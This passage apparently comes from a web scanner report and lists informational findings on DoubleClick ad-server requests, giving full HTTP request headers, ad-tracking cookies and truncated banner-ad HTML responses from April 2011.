Referer: http://cdn.w55c.net/i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5662

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.7. http://ad.doubleclick.net/adi/N4515.131803.TURN/B5378843.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4515.131803.TURN/B5378843.4

Request

GET /adi/N4515.131803.TURN/B5378843.4;sz=160x600;ord=4368933343399774953?;click=http://r.turn.com/r/tpclick/id/6Qq0bLqRoTxeyAkACAIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676620&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658620545&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658620550&frm=1&adk=2614322350&ga_vid=1094438829.1303658621&ga_sid=1303658621&ga_hid=825275319&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=36813005&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:23:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7977

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.8. http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4637.158901.6939390485621/B5385253.8

Request

GET /adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:56:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5643

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.9. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7458
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:19:53 GMT
Expires: Sun, 24 Apr 2011 16:19:53 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...

32.10. http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.158901.DATAXU/B5334493.10

Request

GET /adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4248

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner
...[SNIP]...

32.11. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.13

Request

GET /adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:29:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5603

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...

32.12. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.16

Request

GET /adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:21:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5736

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...

32.13. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B5114832.6

Request

GET /adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2522
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 15:20:02 GMT
Expires: Sun, 24 Apr 2011 15:20:02 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additio
...[SNIP]...

32.14. http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.158901.DATAXU/B4799014.12

Request

GET /adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5325
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:32:14 GMT
Expires: Sun, 24 Apr 2011 16:32:14 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.15. http://ad.doubleclick.net/adi/N6648.150834.TURN/B5275279.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6648.150834.TURN/B5275279.6

Request

GET /adi/N6648.150834.TURN/B5275279.6;sz=728x90;ord=3204984562765078005?;click=http://r.turn.com/r/tpclick/id/9R05pnpkeiwPdg4A_gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658599151&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658599159&frm=1&adk=513358139&ga_vid=955713783.1303658599&ga_sid=1303658599&ga_hid=1255304632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1036

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...

32.16. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/topics/consumer_advice/article

Request

GET /adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=2-336showcase;tile=9;sz=336x280;ord=02880823?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
